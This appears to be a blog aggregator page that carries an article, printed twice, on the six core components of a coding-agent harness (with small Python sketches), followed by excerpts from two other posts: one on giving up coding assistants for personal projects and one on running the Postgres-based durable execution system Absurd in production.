An LLM is the core next-token model. A reasoning model is still an LLM, but usually one that was trained and/or prompted to spend more inference-time compute on intermediate reasoning, verification, or search over candidate answers. An agent is a layer on top, which can be understood as a control loop around the model. Typically, given a goal, the agent layer (or harness) decides what to inspect next, which tools to call, how to update its state, and when to stop. Roughly, we can think about the relationship like this: the LLM is the engine, a reasoning model is a beefed-up engine (more powerful, but more expensive to use), and an agent harness helps us use the model. The analogy is not perfect, because we can also use conventional and reasoning LLMs as standalone models (in a chat UI or Python session), but I hope it conveys the main point.

Figure 2: The relationship between conventional LLM, reasoning LLM (or reasoning model), and an LLM wrapped in an agent harness.

In other words, the agent is the system that repeatedly calls the model inside an environment.
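(To make the control-loop idea concrete, here is a minimal sketch in Python; the decide/tool/finish names are illustrative, not the API of any particular harness.)

    def agent_loop(goal, model, tools, max_steps=20):
        state = {"goal": goal, "history": []}
        for _ in range(max_steps):
            action = model.decide(state)  # observe/inspect/choose: pick the next step
            if action.kind == "finish":   # the model decides when to stop
                return action.result
            result = tools[action.tool](**action.args)  # act: run the chosen tool
            state["history"].append((action, result))   # feed the observation back in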
So, in short, we can summarize it like this:

LLM: the raw model
Reasoning model: an LLM optimized to output intermediate reasoning traces and to verify itself more
Agent: a loop that uses a model plus tools, memory, and environment feedback
Agent harness: the software scaffold around an agent that manages context, tool use, prompts, state, and control flow
Coding harness: a special case of an agent harness; i.e., a task-specific harness for software engineering that manages code context, tools, execution, and iterative feedback

As listed above, in the context of agents and coding tools, we also have the two popular terms agent harness and (agentic) coding harness. A coding harness is the software scaffold around a model that helps it write and edit code effectively, while an agent harness is a bit broader and not specific to coding (e.g., think of OpenClaw). Codex and Claude Code can be considered coding harnesses.

Anyways, a better LLM provides a better foundation for a reasoning model (which involves additional training), and a harness gets more out of this reasoning model. Sure, LLMs and reasoning models are also capable of solving coding tasks by themselves (without a harness), but coding work is only partly about next-token generation. A lot of it is about repo navigation, search, function lookup, diff application, test execution, error inspection, and keeping all the relevant information in context. (Coders may know that this is hard mental work, which is why we don't like to be disrupted during coding sessions :)).

Figure 3: A coding harness combines three layers: the model family, an agent loop, and runtime supports. The model provides the "engine", the agent loop drives iterative problem solving, and the runtime supports provide the plumbing. Within the loop, "observe" collects information from the environment, "inspect" analyzes that information, "choose" selects the next step, and "act" executes it.

The takeaway here is that a good coding harness can make both a reasoning and a non-reasoning model feel much stronger than it does in a plain chat box, because it helps with context management and more.

The Coding Harness

As mentioned in the previous section, when we say harness, we typically mean the software layer around the model that assembles prompts, exposes tools, tracks file state, applies edits, runs commands, manages permissions, caches stable prefixes, stores memory, and more. Today, when using LLMs, this layer shapes most of the user experience compared to prompting the model directly or using a web chat UI (which is closer to "chat with uploaded files"). Since, in my view, the vanilla versions of LLMs nowadays have very similar capabilities (e.g., the vanilla versions of GPT-5.4, Opus 4.6, and GLM-5 or so), the harness can often be the distinguishing factor that makes one LLM work better than another. This is speculative, but I suspect that if we dropped one of the latest, most capable open-weight LLMs, such as GLM-5, into a similar harness, it could likely perform on par with GPT-5.4 in Codex or Claude Opus 4.6 in Claude Code. That said, some harness-specific post-training is usually beneficial. For example, OpenAI historically maintained separate GPT-5.3 and GPT-5.3-Codex variants.

In the next section, I want to go more into the specifics and discuss the core components of a coding harness using my Mini Coding Agent: https://github.com/rasbt/mini-coding-agent

Figure 4: Main harness features of a coding agent / coding harness that will be discussed in the following sections.
By the way, in this article, I use the terms "coding agent" and "coding harness" somewhat interchangeably for simplicity. (Strictly speaking, the agent is the model-driven decision-making loop, while the harness is the surrounding software scaffold that provides context, tools, and execution support.)

Figure 5: Minimal but fully working, from-scratch Mini Coding Agent (implemented in pure Python)

Anyways, below are six main components of coding agents. You can check out the source code of my minimal but fully working, from-scratch Mini Coding Agent (implemented in pure Python) for more concrete code examples; the code annotates the six components discussed below via code comments.

1. Live Repo Context

This is maybe the most obvious component, but it is also one of the most important ones. When a user says "fix the tests" or "implement xyz," the model should know whether it is inside a Git repo, what branch it is on, which project documents might contain instructions, and so on. That's because those details often change or affect what the correct action is. For example, "fix the tests" is not a self-contained instruction. If the agent sees AGENTS.md or a project README, it may learn which test command to run. If it knows the repo root and layout, it can look in the right places instead of guessing. Also, the git branch, status, and commits can help provide more context about what changes are currently in progress and where to focus.

Figure 6: The agent harness first builds a small workspace summary that gets combined with the user request for additional project context.

The takeaway is that the coding agent collects info ("stable facts" as a workspace summary) upfront before doing any work, so that it is not starting from zero, without context, on every prompt.

2. Prompt Shape And Cache Reuse

Once the agent has a repo view, the next question is how to feed that information to the model. The previous figure showed a simplified view of this ("Combined prompt: prefix + request"), but in practice, it would be relatively wasteful to combine and re-process the workspace summary on every user query. Coding sessions are repetitive: the agent rules usually stay the same, the tool descriptions usually stay the same, and even the workspace summary usually stays (mostly) the same. The main changes are the latest user request, the recent transcript, and maybe the short-term memory. "Smart" runtimes don't rebuild everything as one giant undifferentiated prompt on every turn, as illustrated in the figure below.

Figure 7: The agent harness builds a stable prompt prefix, adds the changing session state, and then feeds that combined prompt to the model.

The main difference from section 1 is that section 1 was about gathering repo facts; here, we are interested in packaging and caching those facts efficiently for repeated model calls. The "stable" in "stable prompt prefix" means that the information contained there doesn't change much: it usually contains the general instructions, tool descriptions, and the workspace summary. We don't want to waste compute on rebuilding it from scratch in each interaction if nothing important has changed. The other components are updated more frequently (usually each turn); this includes short-term memory, the recent transcript, and the newest user request. In short, the caching aspect for the stable prompt prefix is simply that a smart runtime tries to reuse that part.
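(A minimal sketch of this prefix-plus-state assembly, with illustrative variable names; real harnesses combine this with provider-side prompt caching, which only pays off if the prefix stays identical across turns.)

    # Built once per session (or until the workspace meaningfully changes),
    # so the model provider can cache the processed prefix:
    stable_prefix = "\n\n".join(
        [general_instructions, tool_descriptions, workspace_summary]
    )

    def build_prompt(short_term_memory, recent_transcript, user_request):
        # Only the session state below the cached prefix is rebuilt each turn
        return "\n\n".join(
            [stable_prefix, short_term_memory, recent_transcript, user_request]
        )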
3. Tool Access and Use

Tool access and tool use are where it starts to feel less like chat and more like an agent. A plain model can suggest commands in prose, but an LLM in a coding harness should do something narrower and more useful: actually execute the command and retrieve the results (versus us calling the command manually and pasting the results back into the chat). But instead of letting the model improvise arbitrary syntax, the harness usually provides a pre-defined list of allowed, named tools with clear inputs and clear boundaries. (Of course, something like Python can be part of this, so that the agent could also execute an arbitrarily wide range of shell commands.) The tool-use flow is illustrated in the figure below.

Figure 8: The model emits a structured action, the harness validates it, optionally asks for approval, executes it, and feeds the bounded result back into the loop.

To illustrate this, below is an example of how this usually looks to the user in my Mini Coding Agent. (This is not as pretty as Claude Code or Codex because it is very minimal and uses plain Python without any external dependencies.)

Figure 9: Illustration of a tool call approval request in the Mini Coding Agent.

Here, the model has to choose an action that the harness recognizes, like list files, read a file, search, run a shell command, write a file, etc. It also has to provide arguments in a shape that the harness can check. So when the model asks to do something, the runtime can stop and run programmatic checks like "Is this a known tool?", "Are the arguments valid?", "Does this need user approval?", "Is the requested path even inside the workspace?" Only after those checks pass does anything actually run. While running coding agents of course carries some risk, the harness checks also improve reliability because the model doesn't execute totally arbitrary commands. Also, besides rejecting malformed actions and approval gating, file access can be kept inside the repo by checking file paths. In a sense, the harness gives the model less freedom, but it improves usability at the same time.
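(A minimal sketch of those programmatic checks, with a hypothetical tool registry; the Mini Coding Agent's real checks differ in detail.)

    import os

    TOOLS = {"list_files", "read_file", "search", "run_shell", "write_file"}
    NEEDS_APPROVAL = {"run_shell", "write_file"}

    def check_action(action: dict, workspace_root: str) -> str:
        if action.get("tool") not in TOOLS:
            return "reject: unknown tool"
        path = action.get("args", {}).get("path")
        if path is not None:
            # Resolve the path and make sure it stays inside the workspace
            root = os.path.realpath(workspace_root)
            full = os.path.realpath(os.path.join(root, path))
            if not full.startswith(root + os.sep):
                return "reject: path escapes workspace"
        if action["tool"] in NEEDS_APPROVAL:
            return "needs user approval"
        return "ok"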
4. Context Compaction

Context bloat is not a problem unique to coding agents but an issue for LLMs in general. Sure, LLMs support longer and longer contexts these days (and I recently wrote about the attention variants that make this computationally more feasible), but long contexts are still expensive and can also introduce additional noise (if there is a lot of irrelevant info). Coding agents are even more susceptible to context bloat than regular LLMs during multi-turn chats because of repeated file reads, lengthy tool outputs, logs, etc. If the runtime keeps all of that at full fidelity, it will run out of available context tokens pretty quickly. So, a good coding harness is usually pretty sophisticated about handling context bloat, beyond just cutting or summarizing information like regular chat UIs. Conceptually, context compaction in coding agents might work as summarized in the figure below. Specifically, we are zooming further into the clip (step 6) part of Figure 8 in the previous section.

Figure 10: Large outputs are clipped, older reads are deduplicated, and the transcript is compressed before it goes back into the prompt.

A minimal harness uses at least two compaction strategies to manage that problem. The first is clipping, which shortens long document snippets, large tool outputs, memory notes, and transcript entries. In other words, it prevents any one piece of text from taking over the prompt budget just because it happened to be verbose. The second strategy is transcript reduction or summarization, which turns the full session history (more on that in the next section) into a smaller promptable summary. A key trick here is to keep recent events richer because they are more likely to matter for the current step, and to compress older events more aggressively because they are likely less relevant. Additionally, we also deduplicate older file reads so the model does not keep seeing the same file content over and over again just because it was read multiple times earlier in the session. Overall, I think this is one of the underrated, boring parts of good coding-agent design. A lot of apparent "model quality" is really context quality.

5. Structured Session Memory

In practice, all six core concepts covered here are highly intertwined, and the different sections and figures cover them with different focuses or zoom levels. The previous section covered prompt-time use of history and how we build a compact transcript. The question there was: how much of the past should go back into the model on the next turn? So the emphasis was compression, clipping, deduplication, and recency. This section, structured session memory, is about the storage-time structure of history. The question here is: what does the agent keep over time as a permanent record? The emphasis is that the runtime keeps a fuller transcript as durable state, alongside a lighter memory layer that is smaller and gets modified and compacted rather than just appended to. To summarize, a coding agent separates state into (at least) two layers:

working memory: the small, distilled state the agent keeps explicitly
a full transcript: this covers all the user requests, tool outputs, and LLM responses

Figure 11: New events get appended to a full transcript and summarized in a working memory. The session files on disk are usually stored as JSON files.

The figure above illustrates the two main session files, the full transcript and the working memory, which usually get stored as JSON files on disk. As mentioned before, the full transcript stores the whole history, and it's resumable if we close the agent. The working memory is more of a distilled version with the currently most important info, which is somewhat related to the compact transcript. But the compact transcript and working memory have slightly different jobs. The compact transcript is for prompt reconstruction: its job is to give the model a compressed view of recent history so it can continue the conversation without seeing the full transcript every turn. The working memory is meant for task continuity: its job is to keep a small, explicitly maintained summary of what matters across turns -- things like the current task, important files, and recent notes. Following step 4 in the figure above, the latest user request, together with the LLM response and tool output, would then be recorded as a "new event" in both the full transcript and the working memory in the next round (not shown, to reduce clutter in the figure).
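(A minimal sketch of the two session layers as JSON files, with hypothetical field and file names; it assumes transcript.json already exists and holds a JSON list.)

    import json

    def record_event(event: dict) -> None:
        # The full transcript is append-only and keeps everything at full fidelity
        with open("transcript.json") as f:
            transcript = json.load(f)
        transcript.append(event)
        with open("transcript.json", "w") as f:
            json.dump(transcript, f)

        # The working memory is small and gets rewritten, not appended to
        memory = {
            "current_task": event.get("task"),
            "important_files": event.get("files", []),
            "notes": event.get("summary", ""),
        }
        with open("memory.json", "w") as f:
            json.dump(memory, f)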
6. Delegation With (Bounded) Subagents

Once an agent has tools and state, one of the next useful capabilities is delegation, because it allows us to parallelize certain work into subtasks via subagents and speed up the main task. For example, the main agent may be in the middle of one task and still need a side answer -- which file defines a symbol, what a config says, or why a test is failing. It is useful to split that off into a bounded subtask instead of forcing one loop to carry every thread of work at once. (In my mini coding agent, the implementation is simpler, and the child still runs synchronously, but the underlying idea is the same.)

A subagent is only useful if it inherits enough context to do real work. But if we don't restrict it, we now have multiple agents duplicating work, touching the same files, or spawning more subagents, and so on. So the tricky design problem is not just how to spawn a subagent but also how to bind one :).

Figure 12: The subagent inherits enough context to be useful, but it runs inside tighter boundaries than the main agent.

The trick here is that the subagent inherits enough context to be useful, but is also constrained (for example, read-only and restricted in recursion depth). Claude Code has supported subagents for a long time, and Codex added them more recently. Codex does not generally force subagents into read-only mode; instead, they usually inherit much of the main agent's sandbox and approval setup, so the boundary is more about task scoping, context, and depth.

Components Summary

The sections above tried to cover the main components of coding agents. As mentioned before, they are more or less deeply intertwined in their implementation. However, I hope that covering them one by one helps with the overall mental model of how coding harnesses work, and why they can make the LLM more useful compared to simple multi-turn chats.

Figure 13: Six main features of a coding harness discussed in previous sections.

If you are interested in seeing these implemented in clean, minimalist Python code, you may like my Mini Coding Agent.

How Does This Compare To OpenClaw?

OpenClaw may be an interesting comparison, but it is not quite the same kind of system. OpenClaw is more like a local, general agent platform that can also code, rather than a specialized (terminal) coding assistant. There are still several overlaps with a coding harness:

it uses prompt and instruction files in the workspace, such as AGENTS.md, SOUL.md, and TOOLS.md
it keeps JSONL session files and includes transcript compaction and session management
it can spawn helper sessions and subagents

However, as mentioned above, the emphasis is different. Coding agents are optimized for a person working in a repository and asking a coding assistant to inspect files, edit code, and run local tools efficiently. OpenClaw is more optimized for running many long-lived local agents across chats, channels, and workspaces, with coding as one important workload among several others.

I am excited to share that I finished writing Build A Reasoning Model (From Scratch), and all chapters are now in early access. The publisher is currently working on the layouts, and it should be available this summer. This is probably my most ambitious book so far: I spent about 1.5 years writing it, a large number of experiments went into it, and it is the book I worked hardest on in terms of time, effort, and polish. I hope you'll enjoy it. Build a Reasoning Model (From Scratch) is available on Manning and Amazon. The main topics are:

evaluating reasoning models
inference-time scaling
self-refinement
reinforcement learning
distillation

There is a lot of discussion around "reasoning" in LLMs, and I think the best way to understand what it really means in the context of LLMs is to implement one from scratch!

Amazon (pre-order)
Manning (complete book in early access, pre-final layout, 528 pages)
Coding agents are engineered for software work where the notable parts are not only the model choice but the surrounding system, including repo context, tool design, prompt-cache stability, memory, and long-session continuity. That distinction matters because when we talk about the coding capabilities of LLMs, people often collapse the model, the reasoning behavior, and the agent product into one thing. But before getting into the coding agent specifics, let me briefly provide a bit more context on the difference between the broader concepts, the LLMs, reasoning models, and agents. On The Relationship Between LLMs, Reasoning Models, and Agents An LLM is the core next-token model. A reasoning model is still an LLM, but usually one that was trained and/or prompted to spend more inference-time compute on intermediate reasoning, verification, or search over candidate answers. An agent is a layer on top, which can be understood as a control loop around the model. Typically, given a goal, the agent layer (or harness) decides what to inspect next, which tools to call, how to update its state, and when to stop, etc. Roughly, we can think about the relationship as this: the LLM is the engine, a reasoning model is a beefed-up engine (more powerful, but more expensive to use), and an agent harness helps us the model. The analogy is not perfect, because we can also use conventional and reasoning LLMs as standalone models (in a chat UI or Python session), but I hope it conveys the main point. Figure 2: The relationship between conventional LLM, reasoning LLM (or reasoning model), and an LLM wrapped in an agent harness. In other words, the agent is the system that repeatedly calls the model inside an environment. So, in short, we can summarize it like this: LLM: the raw model Reasoning model : an LLM optimized to output intermediate reasoning traces and to verify itself more Agent: a loop that uses a model plus tools, memory, and environment feedback Agent harness: the software scaffold around an agent that manages context, tool use, prompts, state, and control flow Coding harness: a special case of an agent harness; i.e., a task-specific harness for software engineering that manages code context, tools, execution, and iterative feedback Figure 3. A coding harness combines three layers: the model family, an agent loop, and runtime supports. The model provides the “engine”, the agent loop drives iterative problem solving, and the runtime supports provide the plumbing. Within the loop, “observe” collects information from the environment, “inspect” analyzes that information, “choose” selects the next step, and “act” executes it. The takeaway here is that a good coding harness can make a reasoning and a non-reasoning model feel much stronger than it does in a plain chat box, because it helps with context management and more. The Coding Harness As mentioned in the previous section, when we say harness , we typically mean the software layer around the model that assembles prompts, exposes tools, tracks file state, applies edits, runs commands, manages permissions, caches stable prefixes, stores memory, and many more. Today, when using LLMs, this layer shapes most of the user experience compared to prompting the model directly or using web chat UI (which is closer to “chat with uploaded files”). 
Since, in my view, the vanilla versions of LLMs nowadays have very similar capabilities (e.g., the vanilla versions of GPT-5.4, Opus 4.6, and GLM-5 or so), the harness can often be the distinguishing factor that makes one LLM work better than another. This is speculative, but I suspect that if we dropped one of the latest, most capable open-weight LLMs, such as GLM-5, into a similar harness, it could likely perform on par with GPT-5.4 in Codex or Claude Opus 4.6 in Claude Code. That said, some harness-specific post-training is usually beneficial. For example, OpenAI historically maintained separate GPT-5.3 and GPT-5.3-Codex variants. In the next section, I want to go more into the specifics and discuss the core components of a coding harness using my Mini Coding Agent : https://github.com/rasbt/mini-coding-agent . Figure 4: Main harness features of a coding agent / coding harness that will be discussed in the following sections. By the way, in this article, I use the terms “coding agent” and “coding harness” somewhat interchangeably for simplicity. (Strictly speaking, the agent is the model-driven decision-making loop, while the harness is the surrounding software scaffold that provides context, tools, and execution support.) Figure 5: Minimal but fully working, from-scratch Mini Coding Agent (implemented in pure Python) Anyways, below are six main components of coding agents. You can check out the source code of my minimal but fully working, from-scratch Mini Coding Agent (implemented in pure Python), for more concrete code examples. The code annotates the six components discussed below via code comments: 1. Live Repo Context This is maybe the most obvious component, but it is also one of the most important ones. When a user says “fix the tests” or “implement xyz,” the model should know whether it is inside a Git repo, what branch it is on, which project documents might contain instructions, and so on. That’s because those details often change or affect what the correct action is. For example, “Fix the tests” is not a self-contained instruction. If the agent sees AGENTS.md or a project README, it may learn which test command to run, etc. If it knows the repo root and layout, it can look in the right places instead of guessing. Also, the git branch, status, and commits can help provide more context about what changes are currently in progress and where to focus. Figure 6: The agent harness first builds a small workspace summary that gets combined with the user request for additional project context. The takeaway is that the coding agent collects info (”stable facts” as a workspace summary) upfront before doing any work, so that it’s is not starting from zero, without context, on every prompt. 2. Prompt Shape And Cache Reuse Once the agent has a repo view, the next question is how to feed that information to the model. The previous figure showed a simplified view of this (“Combined prompt: prefix + request”), but in practice, it would be relatively wasteful to combine and re-process the workspace summary on every user query. I.e., coding sessions are repetitive, and the agent rules usually stay the same. The tool descriptions usually stay the same, too. And even the workspace summary usually stays (mostly) the same. The main changes are usually the latest user request, the recent transcript, and maybe the short-term memory. “Smart” runtimes don’t rebuild everything as one giant undifferentiated prompt on every turn, as illustrated in the figure below. 
Figure 7: The agent harness builds a stable prompt prefix, adds the changing session state, and then feeds that combined prompt to the model. The main difference from section 1 is that section 1 was about gathering repo facts. Here, we are now interested in packaging and caching those facts efficiently for repeated model calls. The “stable” “Stable prompt prefix” means that the information contained there doesn’t change too much. It usually contains the general instructions, tool descriptions, and the workspace summary. We don’t want to waste compute on rebuilding it from scratch in each interaction if nothing important has changed. The other components are updated more frequently (usually each turn). This includes short-term memory, the recent transcript, and the newest user request. In short, the caching aspect for the “Stable prompt prefix” is simply that a smart runtime tries to reuse that part. 3. Tool Access and Use Tool access and tool use are where it starts to feel less like chat and more like an agent. A plain model can suggest commands in prose, but an LLM in a coding harness should do something narrower and more useful and be actually able to execute the command and retrieve the results (versus us calling the command manually and pasting the results back into the chat). But instead of letting the model improvise arbitrary syntax, the harness usually provides a pre-defined list of allowed and named tools with clear inputs and clear boundaries. (But of course, something like Python can be part of this so that the agent could also execute an arbitrary wide list of shell commands.) The tool-use flow is illustrated in the figure below. Figure 8: The model emits a structured action, the harness validates it, optionally asks for approval, executes it, and feeds the bounded result back into the loop. To illustrate this, below is an example of how this usually looks to the user using my Mini Coding Agent. (This is not as pretty as Claude Code or Codex because it is very minimal and uses plain Python without any external dependencies.) Figure 9: Illustration of a tool call approval request in the Mini Coding Agent. Here, the model has to choose an action that the harness recognizes, like list files, read a file, search, run a shell command, write a file, etc. It also has to provide arguments in a shape that the harness can check. So when the model asks to do something, the runtime can stop and run programmatic checks like “Is this a known tool?”, “Are the arguments valid?”, “Does this need user approval?” “Is the requested path even inside the workspace?” Figure 10: Large outputs are clipped, older reads are deduplicated, and the transcript is compressed before it goes back into the prompt. A minimal harness uses at least two compaction strategies to manage that problem. The first is clipping, which shortens long document snippets, large tool outputs, memory notes, and transcript entries. In other words, it prevents any one piece of text from taking over the prompt budget just because it happened to be verbose. The second strategy is transcript reduction or summarization, which turns the full session history (more on that in the next section) into a smaller promptable summary. A key trick here is to keep recent events richer because they are more likely to matter for the current step. And we compress older events more aggressively because they are likely less relevant. 
Additionally, we also deduplicate older file reads so the model does not keep seeing the same file content over and over again just because it was read multiple times earlier in the session. Overall, I think this is one of the underrated, boring parts of good coding-agent design. A lot of apparent “model quality” is really context quality. 5. Structured Session Memory In practice, all these 6 core concepts covered here are highly intertwined, and the different sections and figures cover them with different focuses or zoom levels. In the previous section, we covered prompt-time use of history and how we build a compact transcript. The question there is: how much of the past should go back into the model on the next turn? So the emphasis is compression, clipping, deduplication, and recency. Now, this section, structured session memory, is about the storage-time structure of history. The question here is: what does the agent keep over time as a permanent record? So the emphasis is that the runtime keeps a fuller transcript as a durable state, alongside a lighter memory layer that is smaller and gets modified and compacted rather than just appended to. To summarize, a coding agent separates state into (at least) two layers: working memory: the small, distilled state the agent keeps explicitly a full transcript: this covers all the user requests, tool outputs, and LLM responses Figure 11: New events get appended to a full transcript and summarized in a working memory. The session files on disk are usually stored as JSON files. The figure above illustrates the two main session files, the full transcript and the working memory, that usually get stored as JSON files on disk. As mentioned before, the full transcript stores the whole history, and it’s resumable if we close the agent. The working memory is more of a distilled version with the currently most important info, which is somewhat related to the compact transcript. But the compact transcript and working memory have slightly different jobs. The compact transcript is for prompt reconstruction. Its job is to give the model a compressed view of recent history so it can continue the conversation without seeing the full transcript every turn. The working memory is more meant for task continuity. Its job is to keep a small, explicitly maintained summary of what matters across turns, things like the current task, important files, and recent notes. Following step 4 in the figure above, the latest user request, together with the LLM response and tool output, would then be recorded as a “new event” in both the full transcript and working memory, in the next round, which is not shown to reduce clutter in the figure above. 6. Delegation With (Bounded) Subagents Once an agent has tools and state, one of the next useful capabilities is delegation. The reason is that it allows us to parallelize certain work into subtasks via subagents and speed up the main task. For example, the main agent may be in the middle of one task and still need a side answer, for example, which file defines a symbol, what a config says, or why a test is failing. It is useful to split that off into a bounded subtask instead of forcing one loop to carry every thread of work at once. (In my mini coding agent, the implementation is simpler, and the child still runs synchronously, but the underlying idea is the same.) A subagent is only useful if it inherits enough context to do real work. 
6. Delegation With (Bounded) Subagents

Once an agent has tools and state, one of the next useful capabilities is delegation. The reason is that it allows us to parallelize certain work into subtasks via subagents and speed up the main task. For example, the main agent may be in the middle of one task and still need a side answer, such as which file defines a symbol, what a config says, or why a test is failing. It is useful to split that off into a bounded subtask instead of forcing one loop to carry every thread of work at once. (In my mini coding agent, the implementation is simpler, and the child still runs synchronously, but the underlying idea is the same.) A subagent is only useful if it inherits enough context to do real work. But if we don’t restrict it, we now have multiple agents duplicating work, touching the same files, or spawning more subagents, and so on. So the tricky design problem is not just how to spawn a subagent but also how to bound one :).

Figure 12: The subagent inherits enough context to be useful, but it runs inside tighter boundaries than the main agent.

The trick here is that the subagent inherits enough context to be useful, but is also constrained (for example, read-only access and restricted recursion depth). Claude Code has supported subagents for a long time, and Codex added them more recently. Codex does not generally force subagents into read-only mode. Instead, they usually inherit much of the main agent’s sandbox and approval setup. So, the boundary is more about task scoping, context, and depth.

Components Summary

The sections above tried to cover the main components of coding agents. As mentioned before, they are more or less deeply intertwined in their implementation. However, I hope that covering them one by one helps with the overall mental model of how coding harnesses work, and why they can make the LLM more useful compared to simple multi-turn chats.

Figure 13: Six main features of a coding harness discussed in previous sections.

If you are interested in seeing these implemented in clean, minimalist Python code, you may like my Mini Coding Agent.

How Does This Compare To OpenClaw?

OpenClaw may be an interesting comparison, but it is not quite the same kind of system. OpenClaw is more like a local, general agent platform that can also code, rather than a specialized (terminal) coding assistant. There are still several overlaps with a coding harness:

it uses prompt and instruction files in the workspace, such as AGENTS.md, SOUL.md, and TOOLS.md

it keeps JSONL session files and includes transcript compaction and session management

it can spawn helper sessions and subagents

Build a Reasoning Model (From Scratch) is available on Manning and Amazon. The main topics are: evaluating reasoning models, inference-time scaling, self-refinement, reinforcement learning, and distillation. Amazon (pre-order); Manning (complete book in early access, pre-final layout, 528 pages).

Ankur Sethi 1 week ago

I'm no longer using coding assistants on personal projects

I’ve spent the last few months figuring out how best to use LLMs to build software. In January and February, I used Claude Code to build a little programming language in C. In December I used a local LLM to analyze all the journal entries I wrote in 2025, and then used Gemini to write scripts that could visualize that data. Besides what I’ve written about publicly, I’ve also used Claude Code to:

Write and debug Emacs Lisp for my personal Emacs configuration.

Write several Alfred workflows (in Bash, AppleScript, and Swift) to automate tasks on my computer.

Debug CSS issues on this very website.

Generate React components for a couple of throwaway side projects.

Generate Django apps for a couple of throwaway side projects.

Port color themes between text editors.

A lot more that I’m forgetting now.

I won’t lie, I started off skeptical about the ability of LLMs to write code, but I can’t deny the fact that, in 2026, they can produce code that’s as good as or better than a junior-to-intermediate developer’s for most programming domains. If you’re abstaining from learning about or using LLMs in your own work, you’re doing a disservice to yourself and your career. It’s a very real possibility that in five years, most of the code we write will be produced using an LLM. It’s not a certainty, but it’s a strong possibility.

However, I’m not going to stop writing code by hand. Not anytime soon. As long as there are computers to program, I will be programming them using my own two fleshy human hands. I started programming computers because I enjoy the act of programming. I enjoy thinking through problems, coming up with solutions, evolving those solutions so that they are as correct and clear as possible, and then putting them out into the world where they can be of use to people. It’s a fun and fulfilling profession.

Some people see the need for writing code as an impediment to getting good use out of a computer. In fact, some of the most avid fans of generative AI believe that the act of actually doing the work is a punishment. They see work as unnecessary friction that must be optimized away. Truth is, the friction inherent in doing any kind of work—writing, programming, making music, painting, or any other creative activity generative AI purports to replace—is the whole point. The artifacts you produce as the result of your hard work are not important. They are incidental. The work itself is the point. When you do the work, you change and grow and become more yourself. Work—especially creative work—is an act of self-love if you choose to see it that way.

Besides, when you rely on generative AI to do the work, you miss out on the pleasurable sensations of being in flow state. Your skills atrophy (no, writing good prompts is not a skill, any idiot can do it). Your brain gets saturated with dopamine in the same way as when you gamble, doomscroll, or play a gacha game. Using Claude Code as your main method of producing code is like scrolling TikTok eight hours a day, every day, for work. And the worst part? The code you produce using LLMs is pure cognitive debt. You have no idea what it’s doing, only that it seems to be doing what you want it to do. You don’t have a mental model for how it works, and you can’t fix it if it breaks in production. Such a codebase is not an asset but a liability. I predict that in 1-3 years we’re going to see organizations rewrite their LLM-generated software using actual human programmers.

Personally, I’ve stopped using generative AI to write code for my personal projects. I still use Claude Code as a souped-up search engine to look up information, or to help me debug nasty errors. But I’m manually typing every single line of code in my current Django project, with my own fingers, using a real physical keyboard. I’m even thinking up all the code using my own brain. Miraculous!
For the commercial projects I work on for my clients, I’m going to follow whatever the norms around LLM use happen to be at my workplace. If a client requires me to use Claude Code to write every single line of code, I’ll be happy to oblige. If they ban LLMs outright, I’m fine with that too. After spending hundreds of hours yelling at Claude, I’m dangerously proficient at getting it to do the right thing. But I haven’t lost my programming skills yet, and I don’t plan to. I’m flexible. Given the freedom to choose, I’d probably pick a middle path: use LLMs to generate boilerplate code, write tricky test cases, debug nasty issues I can’t figure out, and quickly prototype ideas to test. I’m not an AI vegan. But when it comes to code I write for myself—which includes the code that runs this website—I’m going to continue writing it myself, line by line, like I always did. Somebody has to clean up after the robots when they make a mess, right?

Armin Ronacher 1 week ago

Absurd In Production

About five months ago I wrote about Absurd, a durable execution system we built for our own use at Earendil, sitting entirely on top of Postgres and Postgres alone. The pitch was simple: you don’t need a separate service, a compiler plugin, or an entire runtime to get durable workflows. You need a SQL file and a thin SDK. Since then we’ve been running it in production, and I figured it’s worth sharing what the experience has been like. The short version: the design held up, the system has been a pleasure to work with, and other people seem to agree.

Absurd is a durable execution system that lives entirely inside Postgres. The core is a single SQL file (absurd.sql) that defines stored procedures for task management, checkpoint storage, event handling, and claim-based scheduling. On top of that sit thin SDKs (currently TypeScript, Python, and an experimental Go one) that make the system ergonomic in your language of choice. The model is straightforward: you register tasks, decompose them into steps, and each step acts as a checkpoint. If anything fails, the task retries from the last completed step. Tasks can sleep, wait for external events, and suspend for days or weeks. All state lives in Postgres. If you want the full introduction, the original blog post covers the fundamentals. What follows here is what we’ve learned since.

The project got multiple releases over the last five months. Most of the changes are things you’d expect from a system that people actually started depending on: hardened claim handling, watchdogs that terminate broken workers, deadlock prevention, proper lease management, event race conditions, and all the edge cases that only show up when you’re running real workloads. A few things worth calling out specifically.

Decomposed steps. The original design only had a single step call, where you pass in a function and get back its checkpointed result. That works well for many cases but not all. Sometimes you need to know whether a step already ran before deciding what to do next. So we added a decomposed pair of calls, which gives you a handle you can inspect before committing the result. This turned out to be very useful for modeling intentional failures and conditional logic. This in particular is necessary when working with “before call” and “after call” type hook APIs.

Task results. You can now spawn a task, go do other things, and later come back to fetch or await its result. This sounds obvious in hindsight, but the original system was purely fire-and-forget. Having proper result inspection made it possible to use Absurd for things like spawning child tasks from within a parent workflow and waiting for them to finish. This is particularly useful for debugging with agents too.

absurdctl. We built this out as a proper CLI tool. You can initialize schemas, run migrations, create queues, spawn tasks, emit events, and retry failures from the command line. It’s installable via the usual package channels or as a standalone binary. This has been invaluable for debugging production issues. When something is stuck, being able to just inspect the task and see exactly where it stopped is a very different experience from digging through logs.

Habitat. A small Go application that serves up a web dashboard for monitoring tasks, runs, checkpoints, and events. It connects directly to Postgres and gives you a live view of what’s happening. It’s simple, but it’s the kind of thing that makes the system more enjoyable for humans.
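To make the task/step/checkpoint model concrete, here is a minimal Python sketch of the replay idea. To be clear, this is not the Absurd SDK API; the names are hypothetical, and a JSON file stands in for Postgres:

```python
# Illustrative sketch of the task/step/checkpoint model. NOT the actual
# Absurd SDK: names are hypothetical, and a JSON file stands in for Postgres.
import json
from pathlib import Path

class TaskRun:
    def __init__(self, task_id: str, store: Path = Path("checkpoints")):
        self.path = store / f"{task_id}.json"
        self.path.parent.mkdir(exist_ok=True)
        self.checkpoints = json.loads(self.path.read_text()) if self.path.exists() else {}

    def step(self, name: str, fn):
        """Run fn once; on retry, replay the cached result instead."""
        if name in self.checkpoints:
            return self.checkpoints[name]   # completed earlier: skip the work
        result = fn()                       # may raise: the task retries from here
        self.checkpoints[name] = result
        self.path.write_text(json.dumps(self.checkpoints))
        return result

# Usage: if the process dies after "fetch", a retry replays "fetch" from the
# store and resumes at "summarize".
run = TaskRun("report-42")
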